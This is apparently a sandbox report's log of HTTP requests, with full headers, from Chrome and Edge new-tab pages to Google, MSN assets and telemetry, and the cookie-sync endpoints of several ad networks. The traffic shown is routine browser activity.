Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CI+2yQEIorbJAQipncoBCMD2ygEIlaHLAQic/swBCIWgzQEIrJ7OAQjkr84BCMO2zgEIvbnOAQjtvM4BCLu9zgEI1r3OAQjMv84BGMHLzAEYva7OARidsc4BSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CI+2yQEIorbJAQipncoBCMD2ygEIlaHLAQic/swBCIWgzQEIrJ7OAQjkr84BCMO2zgEIvbnOAQjtvM4BCLu9zgEI1r3OAQjMv84BGMHLzAEYva7OARidsc4BSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgRmgfycGL7HrL4GIjAhmMFMPH8wUKNr0bEtYM3LnQPsGF3J5h98t4VT4GecfiJQS2W_-ag002XOc99_7xoyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: NID=522=IVojWvzg6TUyKJVw0ku_QR3hPubqVuwe0yb4y4b-YIRsbXqlvFf4nf8hHcIJ1ezCk3DLcehLC-_5Gg1-eTlFENuF2t0DqMXXbVfN2CESIJWKoxrg2MoLaGmryadsX7Ff1GoLgL7-rmtQQBll9jCp-FFqmSeF3EAn4BWA9GOJ8HgICHnqGGsPvqV6deB-Ps1gO_KrS_reNHfeikY
Source: global trafficHTTP traffic detected: GET /sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgRmgfycGL7HrL4GIjAmpIoRwQKUszb_kOodZXKTvmHkevR-Cd2RnhaUlOi-F-4Uf63dtl_aaApMYLDB-XMyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CI+2yQEIorbJAQipncoBCMD2ygEIlaHLAQic/swBCIWgzQEIrJ7OAQjkr84BCMO2zgEIvbnOAQjtvM4BCLu9zgEI1r3OAQjMv84BGMHLzAEYva7OARidsc4BSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: NID=522=OsvFMy0TgwoJRxbHC4JnqoCvr3qemCRmPKC10ZSZhhfE86TZBsQU7VmemVGgjpeaVwzhIP47Yf26Vw-fhI5OqagPGudTV5bsgbXftG8iKYPpr9wqdTXgk2ItVVq0oLoQ5j87AUXdpaRxR1HURODf7wyOT8W3s2tmAfN_fdfEOUZKBw_BpnUZlZ4bhCxKImP1clIgZtmnPqN0XjU
Source: global trafficHTTP traffic detected: GET /edge/ntp?locale=en-US&title=New%20tab&dsp=1&sp=Bing&startpage=1&PC=U531&OCID=MNHP_U531 HTTP/1.1Host: ntp.msn.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /bundles/v1/edgeChromium/latest/SSR-extension.867cdfd625d830718faf.js HTTP/1.1Host: ntp.msn.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"Device-Memory: 8Origin: https://ntp.msn.comsec-ch-ua-model: rtt: 100sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "94.0.992.31"sec-ch-ua-platform-version: "10.0.0"downlink: 1.3sec-ch-ua-bitness: "64"ect: 4gsec-ch-prefers-color-scheme: lightsec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/edge/ntp?locale=en-US&title=New%20tab&dsp=1&sp=Bing&startpage=1&PC=U531&OCID=MNHP_U531Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _C_ETH=1; sptmarket=en-US||us|en-us|en-us|en||cf=8|RefA=CE27969BA8D74822BE092FFEAAAF385A.RefC=2025-03-07T16:50:12Z; USRLOC=; MUID=0DDB686F4DAE69E20AF07DC74C2A6898; MUIDB=0DDB686F4DAE69E20AF07DC74C2A6898; _EDGE_S=F=1&SID=09B6721C09FF608E3C5C67B408E461B2; _EDGE_V=1
Source: global trafficHTTP traffic detected: GET /bundles/v1/edgeChromium/latest/web-worker.948ffa5ea2d441a35f55.js HTTP/1.1Host: ntp.msn.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"Device-Memory: 8sec-ch-ua-model: rtt: 200sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "94.0.992.31"sec-ch-ua-platform-version: "10.0.0"downlink: 1.45sec-ch-ua-bitness: "64"ect: 4gsec-ch-prefers-color-scheme: lightsec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: same-originSec-Fetch-Dest: workerReferer: https://ntp.msn.com/edge/ntp?locale=en-US&title=New%20tab&dsp=1&sp=Bing&startpage=1&PC=U531&OCID=MNHP_U531Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _C_ETH=1; sptmarket=en-US||us|en-us|en-us|en||cf=8|RefA=CE27969BA8D74822BE092FFEAAAF385A.RefC=2025-03-07T16:50:12Z; USRLOC=; MUID=0DDB686F4DAE69E20AF07DC74C2A6898; MUIDB=0DDB686F4DAE69E20AF07DC74C2A6898; _EDGE_S=F=1&SID=09B6721C09FF608E3C5C67B408E461B2; _EDGE_V=1
Source: global trafficHTTP traffic detected: GET /bundles/v1/edgeChromium/latest/vendors.5d0f28115e15fcff20c5.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /bundles/v1/edgeChromium/latest/microsoft.4fa8815283fe3d88a934.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /bundles/v1/edgeChromium/latest/common.005fa5d1a45c7a2d7a6d.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /bundles/v1/edgeChromium/latest/experience.712fce86a817d16b2c92.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /resolver/api/resolve/v3/config/?expType=AppConfig&expInstance=default&apptype=edgeChromium&v=20250306.449&targetScope={%22audienceMode%22:%22adult%22,%22browser%22:{%22browserType%22:%22edgeChromium%22,%22version%22:%2294%22,%22ismobile%22:%22false%22},%22deviceFormFactor%22:%22desktop%22,%22domain%22:%22ntp.msn.com%22,%22locale%22:{%22content%22:{%22language%22:%22en%22,%22market%22:%22us%22},%22display%22:{%22language%22:%22en%22,%22market%22:%22us%22}},%22ocid%22:%22MNHP_U531%22,%22os%22:%22windows%22,%22platform%22:%22web%22,%22pageType%22:%22dhp%22,%22pageExperiments%22:[%22prg-c-adspfpv%22,%22prg-hometo-hpmsn%22,%22prg-hp-switchfeed%22,%22prg-update-hide%22]} HTTP/1.1Host: ntp.msn.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"Device-Memory: 8sec-ch-ua-model: rtt: 300sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "94.0.992.31"sec-ch-ua-platform-version: "10.0.0"downlink: 1.25sec-ch-ua-bitness: "64"ect: 3gsec-ch-prefers-color-scheme: lightsec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/edge/ntp?locale=en-US&title=New%20tab&dsp=1&sp=Bing&startpage=1&PC=U531&OCID=MNHP_U531Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _C_ETH=1; sptmarket=en-US||us|en-us|en-us|en||cf=8|RefA=CE27969BA8D74822BE092FFEAAAF385A.RefC=2025-03-07T16:50:12Z; USRLOC=; MUID=0DDB686F4DAE69E20AF07DC74C2A6898; MUIDB=0DDB686F4DAE69E20AF07DC74C2A6898; _EDGE_S=F=1&SID=09B6721C09FF608E3C5C67B408E461B2; _EDGE_V=1; MicrosoftApplicationsTelemetryDeviceId=a977fbce-5f22-43a4-bd6f-4313a19b6779
Source: global trafficHTTP traffic detected: GET /c.gif?rnd=1741366219690&udc=true&pg.n=default&pg.t=dhp&pg.c=2083&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-US%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26startpage%3D1%26PC%3DU531%26OCID%3DMNHP_U531&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=ce27969ba8d74822be092ffeaaaf385a&activityId=ce27969ba8d74822be092ffeaaaf385a&d.imd=false&scr=1920x1080&anoncknm=app_anon&issso=&aadState=0 HTTP/1.1Host: c.msn.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _C_ETH=1; USRLOC=; MUID=0DDB686F4DAE69E20AF07DC74C2A6898; _EDGE_S=F=1&SID=09B6721C09FF608E3C5C67B408E461B2; _EDGE_V=1
Source: global trafficHTTP traffic detected: GET /b?rn=1741366219690&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-US%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26startpage%3D1%26PC%3DU531%26OCID%3DMNHP_U531%26content%3D1%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=0DDB686F4DAE69E20AF07DC74C2A6898&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic, HTTP traffic detected:
GET /b2?rn=1741366219690&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-US%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26startpage%3D1%26PC%3DU531%26OCID%3DMNHP_U531%26content%3D1%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=0DDB686F4DAE69E20AF07DC74C2A6898&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1
Host: sb.scorecardresearch.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31
sec-ch-ua-platform: "Windows"
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://ntp.msn.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: UID=1C47a50091fdbfff61fd4501741366220

Source: global traffic, HTTP traffic detected:
GET /c.gif?rnd=1741366219690&udc=true&pg.n=default&pg.t=dhp&pg.c=2083&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-US%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26startpage%3D1%26PC%3DU531%26OCID%3DMNHP_U531&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=ce27969ba8d74822be092ffeaaaf385a&activityId=ce27969ba8d74822be092ffeaaaf385a&d.imd=false&scr=1920x1080&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=7E37932775ED4049B307204B663D93FA&MUID=0DDB686F4DAE69E20AF07DC74C2A6898 HTTP/1.1
Host: c.msn.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31
sec-ch-ua-platform: "Windows"
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://ntp.msn.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: USRLOC=; MUID=0DDB686F4DAE69E20AF07DC74C2A6898; _EDGE_S=F=1&SID=09B6721C09FF608E3C5C67B408E461B2; _EDGE_V=1; SM=T

Source: global traffic, HTTP traffic detected:
GET /sg/msn/1/cm?taboola_hm=0DDB686F4DAE69E20AF07DC74C2A6898&gdpr=0&gdpr_consent= HTTP/1.1
Host: trc.taboola.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31
sec-ch-ua-platform: "Windows"
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://ntp.msn.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Source: global traffic, HTTP traffic detected:
GET /cksync.php?type=nms&cs=3&ovsid=0DDB686F4DAE69E20AF07DC74C2A6898&gdpr=0&gdpr_consent= HTTP/1.1
Host: hbx.media.net
Connection: keep-alive
sec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31
sec-ch-ua-platform: "Windows"
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://ntp.msn.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Source: global traffic, HTTP traffic detected:
GET /m?cdsp=516415&c=0DDB686F4DAE69E20AF07DC74C2A6898&mode=inverse&msn_src=ntp&&gdpr=0&gdpr_consent= HTTP/1.1
Host: cm.mgid.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31
sec-ch-ua-platform: "Windows"
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://ntp.msn.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Source: global traffic, HTTP traffic detected:
GET /uidmappixel?ext_uid=0DDB686F4DAE69E20AF07DC74C2A6898&pname=MSN&gdpr=0&gdpr_consent= HTTP/1.1
Host: sync.outbrain.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31
sec-ch-ua-platform: "Windows"
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://ntp.msn.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Source: global traffic, HTTP traffic detected:
GET /mapuid?suid=0DDB686F4DAE69E20AF07DC74C2A6898&sid=16&gdpr=0&gdpr_consent= HTTP/1.1
Host: eb2.3lift.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31
sec-ch-ua-platform: "Windows"
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://ntp.msn.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Source: global traffic, HTTP traffic detected:
GET /sync/msn?gdpr=0&gdpr_consent= HTTP/1.1
Host: pr-bh.ybp.yahoo.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31
sec-ch-ua-platform: "Windows"
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://ntp.msn.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Source: global traffic, HTTP traffic detected:
GET /setuid?partner=microsoftSsp&dbredirect=true&dnt=0&gdpr=0&gdpr_consent= HTTP/1.1
Host: px.ads.linkedin.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31
sec-ch-ua-platform: "Windows"
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://ntp.msn.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Source: global traffic, HTTP traffic detected:
GET /edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableEmptySectionRoute=true&enableNavPreload=true&enableFallbackVerticalsFeed=true&noCacheLayoutTemplates=true&cacheSSRBasePageResponse=true&enableStaticAdsRouting=true&enableWidgetsRegion=true HTTP/1.1
Host: ntp.msn.com
Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31
Accept: */*
Service-Worker: script
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: same-origin
Sec-Fetch-Dest: serviceworker
Referer: https://ntp.msn.com/edge/ntp?locale=en-US&title=New%20tab&dsp=1&sp=Bing&startpage=1&PC=U531&OCID=MNHP_U531
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: _C_Auth=; pglt-edgeChromium-dhp=2083; sptmarket=en-US||us|en-us|en-us|en||cf=8|RefA=CE27969BA8D74822BE092FFEAAAF385A.RefC=2025-03-07T16:50:12Z; USRLOC=; MUID=0DDB686F4DAE69E20AF07DC74C2A6898; MUIDB=0DDB686F4DAE69E20AF07DC74C2A6898; _EDGE_S=F=1&SID=09B6721C09FF608E3C5C67B408E461B2; _EDGE_V=1; MicrosoftApplicationsTelemetryDeviceId=a977fbce-5f22-43a4-bd6f-4313a19b6779; ai_session=U3AHhvkvWqkroU9hfsRIm7|1741366219682|1741366219682; sptmarket_restored=en-US||us|en-us|en-us|en||cf=8|RefA=CE27969BA8D74822BE092FFEAAAF385A.RefC=2025-03-07T16:50:12Z; _C_ETH=1; msnup=%7B%22cnex%22%3A%22no%22%7D

Source: global traffic, HTTP traffic detected:
GET /edge/ntp?locale=en-US&title=New+tab&OCID=MNHP_U531&enableForceCache=true HTTP/1.1
Host: ntp.msn.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"
Device-Memory: 8
sec-ch-ua-model: 
rtt: 200
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "94.0.992.31"
sec-ch-ua-platform-version: "10.0.0"
downlink: 3.8
sec-ch-ua-bitness: "64"
ect: 4g
sec-ch-prefers-color-scheme: light
sec-ch-ua-platform: "Windows"
Accept: */*
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://ntp.msn.com/edge/ntp?locale=en-US&title=New%20tab&dsp=1&sp=Bing&startpage=1&PC=U531&OCID=MNHP_U531
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: _C_Auth=; pglt-edgeChromium-dhp=2083; sptmarket=en-US||us|en-us|en-us|en||cf=8|RefA=CE27969BA8D74822BE092FFEAAAF385A.RefC=2025-03-07T16:50:12Z; USRLOC=; MUID=0DDB686F4DAE69E20AF07DC74C2A6898; MUIDB=0DDB686F4DAE69E20AF07DC74C2A6898; _EDGE_S=F=1&SID=09B6721C09FF608E3C5C67B408E461B2; _EDGE_V=1; MicrosoftApplicationsTelemetryDeviceId=a977fbce-5f22-43a4-bd6f-4313a19b6779; ai_session=U3AHhvkvWqkroU9hfsRIm7|1741366219682|1741366219682; sptmarket_restored=en-US||us|en-us|en-us|en||cf=8|RefA=CE27969BA8D74822BE092FFEAAAF385A.RefC=2025-03-07T16:50:12Z; _C_ETH=1; msnup=%7B%22cnex%22%3A%22no%22%7D
Source: global traffic, HTTP traffic detected:
GET /sync?ssp=msn&id=0DDB686F4DAE69E20AF07DC74C2A6898&gdpr=0&gdpr_consent= HTTP/1.1
Host: code.yengo.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"
sec-ch-ua-mobile: ?0
